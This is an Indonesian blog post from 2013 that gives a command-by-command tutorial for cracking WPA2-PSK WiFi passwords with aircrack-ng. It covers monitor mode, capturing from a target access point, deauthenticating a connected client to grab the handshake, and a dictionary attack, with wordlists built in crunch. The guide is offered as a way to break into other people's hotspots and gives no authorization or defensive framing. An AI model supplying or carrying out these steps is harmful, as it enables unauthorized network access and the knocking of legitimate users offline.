Sabtu, 11 Mei 2013

Hacking wifi password WPA2-PSK

Tags

^_^ Seret Scroll Ke Bawah Untuk Melihat Postingan ^_^

Klik untuk meperbesar

www.saz-share.blogspot.com

 

Hallo Sahabat SazShare...

kini anda akan saya bawa untuk mengetahui cara hacking WLAN / Hotspot yang berenkripsi WPA.
nb:gunakan wireless card yang support inject
1.buka terminal lalu ketikkan pada terminal  
        Rfkill unblock all

 supaya tidak terjadi error interface

2.ketikkan  

airmon-ng 

untuk melihat interface

3.Disini saya akan menggunakan interface Wlan2 tergantung interface kalian,lalu ketikkan

airmon-ng start wlan2

 Ket::interface wlan2 telah menjadi mode monitor yaitu mon0

4.Kemudian ketikkan perintah berikutnya utuk memonitor sinyal wifi di sekitar dengan perintah      

 Airodump-ng mon0

5. Mengcapture Data
disini target kita adalah akses point xbuster404 di chanel 1 
ketikkan airodump-ng -w wpa2 -c 1 --bssid 94:0C:6D:EE:C2:3F mon0

  ket: -w wpa2 = hasil capturing nantinya(bisa diganti namanya)
         -c 3 = channel yang digunakan broadcast hotspot
          --bssid  94:0C:6D:EE:C2:3F = mac address hotspot
            mon0= mode monitor interface

6.  2.2 Deauthentifikasi Client
Jika dibarisan bawah terdapat station client yang terhubung dengan AP selanjutnya yaitu saatnya kita mengirim perintah deauthentifikasi sebuah client yang terhubung caranya, buka terminal baru ketikan :
      aireplay-ng --deauth 10 -a 94:0C:6D:EE:C2:3F -c 94:20:53:D5:09:65 mon0

 

Ket= --deauth 10 = mode penyerangan sampai 10x
         -a = mac adress hotspot
         -c = client yang terhubung hotspot yaitu

ketika mengirim perintah deauth maka si client akan terputus dari hotspot tunggu sampai client konek lagi.Dan kamu akan mendapatkan WPA handshake

ket : hacking wpa2 tidak memerlukan banyak paket seperti hack wep.Kita hanya mencari handshake nya saja

Jika belum dapat handshake lakukan deauthentifikasi client lagi biar tidak usah mengetik ulang perintahnya anda cukup menekan tombol panah atas pada keyboard untuk mengulang perintah terakhir.

Namun sayangnya data yang kita terima (dari Capturan) masih terenkripsi, saat tutorial ini dibuat software aircrack-ng belum dapat membuka enkripsi tersebut akan tetapi hanya bisa menyamakan dan mencocokan binary-nya dengan bantuan kamus.

7.Tunggu sampai mendapatkan WPA handshake biarkan client mengkoneksikan lagi wifinya ke hotspot yang diserang apabia client sudah konek lagi maka kamu akan mendapatkan wpa handshake

 8.Hacking password WPA
Setelah dapat handshake saatnya kita mencocokan binary yang tercapture dengan bantuan kamus, buka Terminal ketikkan  

 aircrack-ng -w '/root/Desktop/Dvil word.txt' wpa2-01.cap

-w '/root/Desktop/Dvil word.txt' = directory wordist/kamus yang ada di desktop untuk mempermudah memasukkan wordist/kamus tinggal drag n drop geret kamus/wordist ke dalam terminal supaya penulisanya benar
wpa2-01.cap = hasil capturing airodump-ng yang letaknya ada di /root

tunggu sampai wordlist/kamus mencocokkan hasil capturing tadi apabia berhasil maka kunci/key akan terpecahkan

Untuk memecahkan password wpa2 harus menggunakan wordlist atau kamus yang benar-benar akurat dan dibutuhkan kesabaran
apabila anda tidak punya wordlist bisa gunakan crunch atau yang lainya

cara menggunkan crunch bisa dilihat di

http://xbuster404.blogspot.com/2012/11/membuat-wordlist-akurat-dengan-crunch.html